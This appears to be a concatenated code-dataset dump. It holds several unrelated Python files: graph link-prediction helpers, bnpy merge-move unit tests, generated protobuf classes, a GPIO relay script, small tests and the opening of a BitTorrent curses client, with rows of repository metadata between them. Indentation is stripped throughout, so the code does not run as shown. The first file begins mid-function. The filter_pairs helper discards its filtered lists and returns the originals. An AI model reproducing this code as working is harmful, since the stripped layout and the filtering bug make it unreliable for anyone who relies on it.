print('loading '+file)
node_type = file.split('.')[-2]
nodes = pd.read_csv(path+'/nodes/'+file,dtype={0: str})
for i, row in nodes.iterrows():
row = list(row)
G.add_node(str(row[0]),type=node_type,features=row[1:])
print('loading relations')
edges = pd.read_csv(path+'/relations/relations.csv',dtype={0: str,1: str,2: str})
for i, row in edges.iterrows():
row = list(row)
G.add_edge(str(row[0]),str(row[1]),type=str(row[2]),features=row[3:])
return G
# def make_small_data(G):
# nodes = np.array(list(G.nodes))
# node_types = np.array([G.nodes[n]['type'] for n in nodes])
# sel_nodes = set()
# for type in set(node_types):
# print('writing type ' + str(type))
# node_feats = []
# for n in nodes[node_types == type][0:10000]:
# sel_nodes.add(n)
# node_feats.append([n] + G.nodes[n]['features'])
# column_names = ['id'] + ['feat_' + str(i) for i in range(len(node_feats[0]) - 1)]
# pd.DataFrame(node_feats, columns=column_names).fillna(0).to_csv('../data/small/' + '/nodes/' + str(type) + '.csv', index=False)
# print('writing relations')
# edges = list(G.edges)
# edge_feats = []
# for e in edges:
# if e[0] in sel_nodes and e[1] in sel_nodes:
# edge_feats.append([e[0], e[1], G[e[0]][e[1]][e[2]]['type']] + G[e[0]][e[1]][e[2]]['features'])
# column_names = ['src', 'dst', 'type'] + ['feat_' + str(i) for i in range(max([len(ef) for ef in edge_feats]) - 3)]
# pd.DataFrame(edge_feats, columns=column_names).fillna(0).to_csv('../data/small/' + '/relations/relations.csv', index=False)
def types_from_files(path):
"""
Gets node/edge types of graph files.
:param path: folder path.
:return: dict with node/edge types.
"""
node_types = []
for file in os.listdir(path+'/nodes'):
node_types.append(file.split('.')[0])
edge_types = list(set(pd.read_csv(path+'/relations/relations.csv').iloc[:,2].astype(str)))
return {'node_types': node_types, 'edge_types': edge_types}
def add_neg_samples(G, pos_pairs, samp_size, steps):
"""
Performs negative sampling.
:param G: NetworkX graph.
:param pos_pairs: A collection of pairs with edges.
:param samp_size: Negative samples per existing edge.
:param steps: Max length of random walk.
:return: A list of positive and negative node pairs and their labels.
"""
pairs = []
labels = []
print(pos_pairs[0])
tail_type = G.nodes[pos_pairs[0][2]]['type']
print(tail_type)
tails = set([n for n in G.nodes if G.nodes[n]['type'] == tail_type])
for i, (head,rel_id,tail) in enumerate(pos_pairs):
print('neg samples {}/{}'.format(i, len(pos_pairs)))
pos = set(G[head])
near = set(nx.ego_graph(G, head, steps).nodes) - pos
#near = set([n for n in subG if G.nodes[n] == tail_type]) - pos
# for j in range(1,steps):
# near -= set(nx.ego_graph(G, head, steps-j).nodes)
near_samp = rnd.sample(near, min(len(near), samp_size))
far = tails - pos - near
far_samp = rnd.sample(far, min(len(far), samp_size))
pairs.append([head, rel_id, tail])
labels.append(1)
for tail in near_samp:
pairs.append([head, rel_id, tail])
labels.append(0)
for tail in far_samp:
pairs.append([head, rel_id, tail])
labels.append(0)
return pairs, labels
def find_node_types(G, edge_type):
"""
:param G: NetworkX graph.
:param edge_type: Edge type.
:return: Node types that correspond to the edge type.
"""
for e in G.edges:
if G[e[0]][e[1]][e[2]]['type'] == edge_type:
u, v = e[0], e[1]
break
utype = G.nodes[u]['type']
vtype = G.nodes[v]['type']
try:
if int(utype) > int(vtype):
return utype, vtype
else:
return vtype, utype
except:
return utype, vtype
def find_candidate_type(G, edge_type, src_node):
"""
:param G: NetworkX graph.
:param edge_type: An edge type.
:param src_node: A source node.
:return: The node type that is connecter with edge_type to src_node.
"""
stype = G.nodes[src_node]['type']
for e in G.edges:
if G[e[0]][e[1]][e[2]]['type'] == edge_type:
u,v = e[0], e[1]
break
utype = G.nodes[u]['type']
vtype = G.nodes[v]['type']
return vtype if stype==utype else utype
def filter_pairs(test_pairs, test_labels, pair_filter):
'''
:param test_pairs: Node pairs.
:param test_labels: Labels.
:param pair_filter: Filter set.
:return: test_pairs and test_labels that do not exist in pair_filter
'''
new_pairs = []
new_labels = []
for pair, label in zip(test_pairs,test_labels):
if tuple(pair) not in pair_filter:
new_pairs.append(pair)
new_labels.append(label)
return test_pairs, test_labels
def make_train_data(G, edge_type, ntr, nvl, nts, steps=3, neg=5):
"""
:param G: NetworkX graph.
:param edge_type: Edge type.
:param ntr: Number of positive training pairs.
:param nvl: Number of positive validation pairs.
:param nvs: Number of positive test pairs.
:param steps: Maximum path length.
:param neg: Negative samples pre positive egde.
:return: train pairs, train labels, validation pairs, validation edges, path dictionary T
"""
utype, vtype = find_node_types(G, edge_type)
sel_edges = rnd.sample([[e[0],edge_type,e[1]] for e in G.edges if G[e[0]][e[1]][e[2]]['type'] == edge_type
and G.nodes[e[0]]['type'] == utype and G.nodes[e[1]]['type'] == vtype], ntr+nvl+nts)
train_pairs = sel_edges[0:ntr]
train_pairs, train_labels = add_neg_samples(G,train_pairs, neg, steps)
T_tr = find_pair_paths(G, train_pairs, steps)
val_pairs = sel_edges[ntr:ntr+nvl]
val_pairs, val_labels = add_neg_samples(G, val_pairs, neg, steps)
T_vl = find_pair_paths(G, val_pairs, steps)
test_pairs = sel_edges[ntr + nvl:ntr + nvl + nts]
test_pairs, test_labels = add_neg_samples(G, test_pairs, neg, steps)
pair_filter = set([(u, r, v) for u, r, v in train_pairs + val_pairs])
test_pairs, test_labels = filter_pairs(test_pairs, test_labels, pair_filter)
T_ts = find_pair_paths(G, test_pairs, steps)
T = add_Ts(T_ts, add_Ts(T_tr, T_vl))
return train_pairs, train_labels, val_pairs, val_labels, test_pairs, test_labels, T
| 32.023965 | 165 | 0.572148 | 2,202 | 14,699 | 3.677112 | 0.108084 | 0.01482 | 0.004446 | 0.005928 | 0.434852 | 0.35013 | 0.29406 | 0.257256 | 0.209337 | 0.198469 | 0 | 0.016609 | 0.29138 | 14,699 | 458 | 166 | 32.093886 | 0.760753 | 0.285121 | 0 | 0.269076 | 1 | 0 | 0.034689 | 0.007177 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060241 | false | 0 | 0.02008 | 0 | 0.148594 | 0.036145 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4cad8e8992ae30f9b134717c3b3a0717a48b60e | 9,781 | py | Python | refinery/bnpy/bnpy-dev/tests/merge/TestMergeHDPTopicModel.py | csa0001/Refinery | 0d5de8fc3d680a2c79bd0e9384b506229787c74f | [
"MIT"
] | 103 | 2015-01-13T00:48:14.000Z | 2021-11-08T10:53:22.000Z | refinery/bnpy/bnpy-dev/tests/merge/TestMergeHDPTopicModel.py | csa0001/Refinery | 0d5de8fc3d680a2c79bd0e9384b506229787c74f | [
"MIT"
] | 7 | 2015-02-21T04:03:40.000Z | 2021-08-23T20:24:54.000Z | refinery/bnpy/bnpy-dev/tests/merge/TestMergeHDPTopicModel.py | csa0001/Refinery | 0d5de8fc3d680a2c79bd0e9384b506229787c74f | [
"MIT"
] | 27 | 2015-01-23T00:54:31.000Z | 2020-12-30T14:30:50.000Z | '''
Unit tests for MergeMove.py for HDPTopicModels
Verification merging works as expected and produces valid models.
Attributes
------------
self.Data : K=4 simple WordsData object from AbstractBaseTestForHDP
self.hmodel : K=4 simple bnpy model from AbstractBaseTestForHDP
Coverage
-----------
* run_many_merge_moves
* fails to merge away any true comps
* successfully merges away all duplicated comps when chosen randomly
* successfully merges away all duplicated comps when chosen via marglik
* run_merge_move
* fails to merge away any true comps
* successfully merges away all duplicated comps when targeted specifically
* successfully merges away all duplicated comps when chosen randomly
* successfully merges away all duplicated comps when chosen via marglik
success rate > 95%
'''
import numpy as np
import unittest
from AbstractBaseTestForHDP import AbstractBaseTestForHDP
import bnpy
from bnpy.learnalg import MergeMove
from scipy.special import digamma
import copy
class TestMergeHDP(AbstractBaseTestForHDP):
def getSuffStatsPrepForMerge(self, hmodel):
''' With merge flats ENABLED,
run Estep, calc suff stats, then do an Mstep
'''
LP = hmodel.calc_local_params(self.Data)
flagDict = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
SS = hmodel.get_global_suff_stats(self.Data, LP, **flagDict)
hmodel.update_global_params(SS)
return LP, SS
######################################################### Test many moves
#########################################################
def test_run_many_merge_moves_trueModel_random(self):
LP, SS = self.getSuffStatsPrepForMerge(self.hmodel)
PRNG = np.random.RandomState(0)
mergeKwArgs = dict(mergename='random')
a, b, c, MTracker = MergeMove.run_many_merge_moves(self.hmodel,
self.Data, SS,
nMergeTrials=100, randstate=PRNG,
**mergeKwArgs)
assert MTracker.nTrial == SS.K * (SS.K-1)/2
assert MTracker.nSuccess == 0
def test_run_many_merge_moves_dupModel_random(self):
self.MakeModelWithDuplicatedComps()
LP, SS = self.getSuffStatsPrepForMerge(self.dupModel)
PRNG = np.random.RandomState(0)
mergeKwArgs = dict(mergename='random')
a, b, c, MTracker = MergeMove.run_many_merge_moves(self.dupModel,
self.Data, SS,
nMergeTrials=100, randstate=PRNG,
**mergeKwArgs)
assert MTracker.nSuccess == 4
assert (0,4) in MTracker.acceptedOrigIDs
assert (1,5) in MTracker.acceptedOrigIDs
assert (2,6) in MTracker.acceptedOrigIDs
assert (3,7) in MTracker.acceptedOrigIDs
def test_run_many_merge_moves_dupModel_marglik(self):
self.MakeModelWithDuplicatedComps()
LP, SS = self.getSuffStatsPrepForMerge(self.dupModel)
PRNG = np.random.RandomState(456)
mergeKwArgs = dict(mergename='marglik')
a, b, c, MTracker = MergeMove.run_many_merge_moves(self.dupModel,
self.Data, SS,
nMergeTrials=100, randstate=PRNG,
**mergeKwArgs)
for msg in MTracker.InfoLog:
print msg
assert MTracker.nSuccess == 4
assert MTracker.nTrial == 4
assert (0,4) in MTracker.acceptedOrigIDs
assert (1,5) in MTracker.acceptedOrigIDs
assert (2,6) in MTracker.acceptedOrigIDs
assert (3,7) in MTracker.acceptedOrigIDs
######################################################### run_merge_move
######################################################### full tests
def test_model_matches_ground_truth_as_precheck(self):
''' Verify HDPmodel is able to learn ground truth parameters
and maintain stable estimates after several E/M steps
'''
np.set_printoptions(precision=3,suppress=True)
# Advance the model several iterations
for rr in range(5):
self.run_Estep_then_Mstep()
for k in range(self.hmodel.obsModel.K):
logtopicWordHat = self.hmodel.obsModel.comp[k].Elogphi
topicWordHat = np.exp(logtopicWordHat)
diffVec = np.abs(topicWordHat - self.Data.TrueParams['topics'][k])
print diffVec
print ' '
assert np.max(diffVec) < 0.04
######################################################### run_merge_move
######################################################### full tests
def test_run_merge_move_on_true_comps_fails(self):
''' Should not be able to merge "true" components into one another
Each is necessary to explain (some) data
'''
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.hmodel.calc_local_params(self.Data)
SS = self.hmodel.get_global_suff_stats(self.Data, LP, **mergeFlags)
for trial in range(10):
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.hmodel, self.Data, SS, mergename='random')
assert newModel.allocModel.K == self.hmodel.allocModel.K
assert newModel.obsModel.K == self.hmodel.obsModel.K
def test_run_merge_move_on_dup_comps_succeeds_with_each_ideal_pair(self):
''' Given the duplicated comps model,
which has a redundant copy of each "true" component,
We show that deliberately merging each pair does succeed.
This is "ideal" since we know in advance which merge pair to try
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
for kA in [0,1,2,3]:
kB = kA + 4 # Ktrue=4, so kA's best match is kA+4
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel,
self.Data, SS, kA=kA, kB=kB)
print MoveInfo['msg']
assert newModel.allocModel.K == self.dupModel.allocModel.K - 1
assert newModel.obsModel.K == self.dupModel.obsModel.K - 1
assert MoveInfo['didAccept'] == 1
def test_run_merge_move_on_dup_comps_fails_with_nonideal_pairs(self):
''' Given the duplicated comps model,
which has a redundant copy of each "true" component,
We show that deliberately merging each pair does succeed.
This is "ideal" since we know in advance which merge pair to try
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
for Kstep in [1,2,3,5,6,7]:
for kA in range(8 - Kstep):
kB = kA + Kstep
newM, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel,
self.Data, SS, kA=kA, kB=kB)
print MoveInfo['msg']
assert MoveInfo['didAccept'] == 0
def test_run_merge_move_on_dup_comps_succeeds_with_all_ideal_pairs(self):
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
myModel = self.dupModel.copy()
for kA in [3,2,1,0]: # descend backwards so indexing still works
kB = kA + 4 # Ktrue=4, so kA's best match is kA+4
myModel, SS, newEv, MoveInfo = MergeMove.run_merge_move(myModel,
self.Data, SS, kA=kA, kB=kB)
print MoveInfo['msg']
assert MoveInfo['didAccept'] == 1
def test_run_merge_move_on_dup_comps_succeeds_with_random_choice(self):
''' Consider Duplicated Comps model.
Out of (8 choose 2) = 28 possible pairs,
exactly 4 produce sensible merges.
Verify that over many random trials where kA,kB drawn uniformly,
we obtain a success rate not too different from 4 / 28 = 0.142857
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
nTrial = 100
nSuccess = 0
PRNG = np.random.RandomState(0)
for trial in range(nTrial):
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, mergename='random', randstate=PRNG)
if MoveInfo['didAccept']:
print MoveInfo['msg']
nSuccess += 1
assert nSuccess > 0
rate = float(nSuccess)/float(nTrial)
print "Expected rate: .1428"
print "Measured rate: %.3f" % (rate)
assert rate > 0.1
assert rate < 0.2
def test_run_merge_move_on_dup_comps_succeeds_with_marglik_choice(self):
''' Consider Duplicated Comps model.
Use marglik criteria to select candidates kA, kB.
Verify that the merge accept rate is much higher than at random.
The accept rate should actually be near perfect!
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
nTrial = 100
nSuccess = 0
PRNG = np.random.RandomState(0)
for trial in range(nTrial):
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, mergename='marglik', randstate=PRNG)
print MoveInfo['msg']
if MoveInfo['didAccept']:
nSuccess += 1
assert nSuccess > 0
rate = float(nSuccess)/float(nTrial)
print "Expected rate: >.95"
print "Measured rate: %.3f" % (rate)
assert rate > 0.95
| 42.71179 | 132 | 0.661896 | 1,211 | 9,781 | 5.218827 | 0.21057 | 0.031646 | 0.028481 | 0.018829 | 0.678006 | 0.635127 | 0.606171 | 0.582595 | 0.555222 | 0.540665 | 0 | 0.015274 | 0.216849 | 9,781 | 228 | 133 | 42.899123 | 0.809791 | 0.022595 | 0 | 0.540541 | 0 | 0 | 0.025867 | 0 | 0 | 0 | 0 | 0 | 0.175676 | 0 | null | null | 0 | 0.047297 | null | null | 0.087838 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4cb13969e913f20fb909e4c665d75e81e4a9503 | 5,309 | py | Python | bluzelle/codec/crud/Paging_pb2.py | hhio618/bluezelle-py | c38a07458a36305457680196e8c47372008db5ab | [
"MIT"
] | 3 | 2021-08-19T10:09:29.000Z | 2022-01-05T14:19:59.000Z | bluzelle/codec/crud/Paging_pb2.py | hhio618/bluzelle-py | c38a07458a36305457680196e8c47372008db5ab | [
"MIT"
] | null | null | null | bluzelle/codec/crud/Paging_pb2.py | hhio618/bluzelle-py | c38a07458a36305457680196e8c47372008db5ab | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: crud/Paging.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name="crud/Paging.proto",
package="bluzelle.curium.crud",
syntax="proto3",
serialized_options=b"Z'github.com/bluzelle/curium/x/crud/types",
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x11\x63rud/Paging.proto\x12\x14\x62luzelle.curium.crud"0\n\rPagingRequest\x12\x10\n\x08startKey\x18\x01 \x01(\t\x12\r\n\x05limit\x18\x02 \x01(\x04"0\n\x0ePagingResponse\x12\x0f\n\x07nextKey\x18\x01 \x01(\t\x12\r\n\x05total\x18\x02 \x01(\x04\x42)Z\'github.com/bluzelle/curium/x/crud/typesb\x06proto3',
)
_PAGINGREQUEST = _descriptor.Descriptor(
name="PagingRequest",
full_name="bluzelle.curium.crud.PagingRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="startKey",
full_name="bluzelle.curium.crud.PagingRequest.startKey",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="limit",
full_name="bluzelle.curium.crud.PagingRequest.limit",
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=43,
serialized_end=91,
)
_PAGINGRESPONSE = _descriptor.Descriptor(
name="PagingResponse",
full_name="bluzelle.curium.crud.PagingResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="nextKey",
full_name="bluzelle.curium.crud.PagingResponse.nextKey",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="total",
full_name="bluzelle.curium.crud.PagingResponse.total",
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=93,
serialized_end=141,
)
DESCRIPTOR.message_types_by_name["PagingRequest"] = _PAGINGREQUEST
DESCRIPTOR.message_types_by_name["PagingResponse"] = _PAGINGRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PagingRequest = _reflection.GeneratedProtocolMessageType(
"PagingRequest",
(_message.Message,),
{
"DESCRIPTOR": _PAGINGREQUEST,
"__module__": "crud.Paging_pb2"
# @@protoc_insertion_point(class_scope:bluzelle.curium.crud.PagingRequest)
},
)
_sym_db.RegisterMessage(PagingRequest)
PagingResponse = _reflection.GeneratedProtocolMessageType(
"PagingResponse",
(_message.Message,),
{
"DESCRIPTOR": _PAGINGRESPONSE,
"__module__": "crud.Paging_pb2"
# @@protoc_insertion_point(class_scope:bluzelle.curium.crud.PagingResponse)
},
)
_sym_db.RegisterMessage(PagingResponse)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 30.687861 | 323 | 0.63722 | 546 | 5,309 | 5.90293 | 0.227106 | 0.039094 | 0.050264 | 0.058641 | 0.605337 | 0.587962 | 0.503258 | 0.475954 | 0.475954 | 0.475954 | 0 | 0.026396 | 0.257864 | 5,309 | 172 | 324 | 30.866279 | 0.791624 | 0.067244 | 0 | 0.675497 | 1 | 0.006623 | 0.155466 | 0.102632 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02649 | 0 | 0.02649 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4d084b6842b2f5652d3fa521fd4534554cd0a32 | 518 | py | Python | terminal.py | TeknohouseID/rumah_aria_graha_NEW_2018 | c3513100f68ce57be477372bbc7176ddbde607ad | [
"Unlicense"
] | null | null | null | terminal.py | TeknohouseID/rumah_aria_graha_NEW_2018 | c3513100f68ce57be477372bbc7176ddbde607ad | [
"Unlicense"
] | null | null | null | terminal.py | TeknohouseID/rumah_aria_graha_NEW_2018 | c3513100f68ce57be477372bbc7176ddbde607ad | [
"Unlicense"
] | null | null | null | import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
pin_terminal = [15,16] #definisi pin GPIO yg terhubung ke relay terminal
GPIO.setup(pin_terminal, GPIO.OUT)
def terminal_on(pin): #fungsi untuk menyalakan lampu (NC)
GPIO.output(pin, 1)
def terminal_off(pin): #fungsi untuk mematikan lampu (NC)
GPIO.output(pin, 0)
#Coded by Faisal Candrasyah H, Founder Teknohouse.ID, Co-founder and former CTO of Indisbuilding
#pin 15 = relay 4 = dispenser_cewek
#pin 16 = relay 5 = dispenser_cowok
| 24.666667 | 96 | 0.758687 | 83 | 518 | 4.662651 | 0.60241 | 0.056848 | 0.072351 | 0.087855 | 0.103359 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027149 | 0.146718 | 518 | 20 | 97 | 25.9 | 0.848416 | 0.53668 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4d3c18e507f51dc482e2dde54e9596a534b4b39 | 360 | py | Python | tests/test__init__.py | Combofoods/pyenv | 8b33173e593054b8d46a8c3be99c44f7294c7069 | [
"MIT"
] | 1 | 2020-07-22T12:19:26.000Z | 2020-07-22T12:19:26.000Z | tests/test__init__.py | Combofoods/pyenv | 8b33173e593054b8d46a8c3be99c44f7294c7069 | [
"MIT"
] | null | null | null | tests/test__init__.py | Combofoods/pyenv | 8b33173e593054b8d46a8c3be99c44f7294c7069 | [
"MIT"
] | null | null | null | import pytest
import envpy
import os
folder = os.path.dirname(__file__)
folder_env_file = f'{folder}/resources'
file_dot_env = 'test.env'
def test__init__():
karg = {'filepath':folder_env_file, 'filename':file_dot_env}
envpy.get_variables(**karg)
envpy.printenv(envpy.get_variables(**karg))
if __name__ == "__main__":
test__init__() | 18 | 64 | 0.713889 | 49 | 360 | 4.632653 | 0.489796 | 0.079295 | 0.114537 | 0.185022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152778 | 360 | 20 | 65 | 18 | 0.744262 | 0 | 0 | 0 | 0 | 0 | 0.138504 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.25 | 0 | 0.333333 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4d975ef883007f74d9af2353db4314fdedd350c | 157 | py | Python | tests/cases/infer.py | div72/py2many | 60277bc13597bd32d078b88a7390715568115fc6 | [
"MIT"
] | 345 | 2021-01-28T17:33:08.000Z | 2022-03-25T16:07:56.000Z | tests/cases/infer.py | mkos11/py2many | be6cfaad5af32c43eb24f182cb20ad63b979d4ef | [
"MIT"
] | 291 | 2021-01-31T13:15:06.000Z | 2022-03-23T21:28:49.000Z | tests/cases/infer.py | mkos11/py2many | be6cfaad5af32c43eb24f182cb20ad63b979d4ef | [
"MIT"
] | 23 | 2021-02-09T17:15:03.000Z | 2022-02-03T05:57:44.000Z | #!/usr/bin/env python3
def foo():
a = 10
# infer that b is an int
b = a
assert b == 10
print(b)
if __name__ == "__main__":
foo()
| 11.214286 | 28 | 0.509554 | 25 | 157 | 2.88 | 0.76 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04902 | 0.350318 | 157 | 13 | 29 | 12.076923 | 0.656863 | 0.280255 | 0 | 0 | 0 | 0 | 0.072072 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.142857 | 0.142857 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4dc9a387c6801eebbce5ef0b1a99718dbb8697f | 17,584 | py | Python | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 12 | 2015-10-20T10:22:01.000Z | 2021-07-19T10:09:44.000Z | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 2 | 2015-10-20T10:22:55.000Z | 2017-02-13T11:05:25.000Z | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 6 | 2015-03-09T12:51:59.000Z | 2020-03-01T13:06:21.000Z | #!/usr/bin/env python
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Original version written by Henry 'Pi' James, modified by (at least)
# John Hoffman and Uoti Urpala
from __future__ import division
from BitTorrent.platform import install_translation
install_translation()
SPEW_SCROLL_RATE = 1
import sys
import os
import threading
from time import time, strftime
from BitTorrent.download import Feedback, Multitorrent
from BitTorrent.defaultargs import get_defaults
from BitTorrent.parseargs import printHelp
from BitTorrent.zurllib import urlopen
from BitTorrent.bencode import bdecode
from BitTorrent.ConvertedMetainfo import ConvertedMetainfo
from BitTorrent.prefs import Preferences
from BitTorrent.obsoletepythonsupport import import_curses
from BitTorrent import configfile
from BitTorrent import BTFailure
from BitTorrent import version
from BitTorrent import GetTorrent
try:
curses = import_curses()
import curses.panel
from curses.wrapper import wrapper as curses_wrapper
from signal import signal, SIGWINCH
except:
print _("Textmode GUI initialization failed, cannot proceed.")
print
print _("This download interface requires the standard Python module "
"\"curses\", which is unfortunately not available for the native "
"Windows port of Python. It is however available for the Cygwin "
"port of Python, running on all Win32 systems (www.cygwin.com).")
print
print _('You may still use "bittorrent-console" to download.')
sys.exit(1)
def fmttime(n):
if n == 0:
return _("download complete!")
try:
n = int(n)
assert n >= 0 and n < 5184000 # 60 days
except:
return _("<unknown>")
m, s = divmod(n, 60)
h, m = divmod(m, 60)
return _("finishing in %d:%02d:%02d") % (h, m, s)
def fmtsize(n):
s = str(n)
size = s[-3:]
while len(s) > 3:
s = s[:-3]
size = '%s,%s' % (s[-3:], size)
if n > 999:
unit = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB']
i = 1
while i + 1 < len(unit) and (n >> 10) >= 999:
i += 1
n >>= 10
n /= (1 << 10)
size = '%s (%.0f %s)' % (size, n, unit[i])
return size
class CursesDisplayer(object):
def __init__(self, scrwin, errlist, doneflag, reread_config, ulrate):
self.scrwin = scrwin
self.errlist = errlist
self.doneflag = doneflag
signal(SIGWINCH, self.winch_handler)
self.changeflag = threading.Event()
self.done = False
self.reread_config = reread_config
self.ulrate = ulrate
self.activity = ''
self.status = ''
self.progress = ''
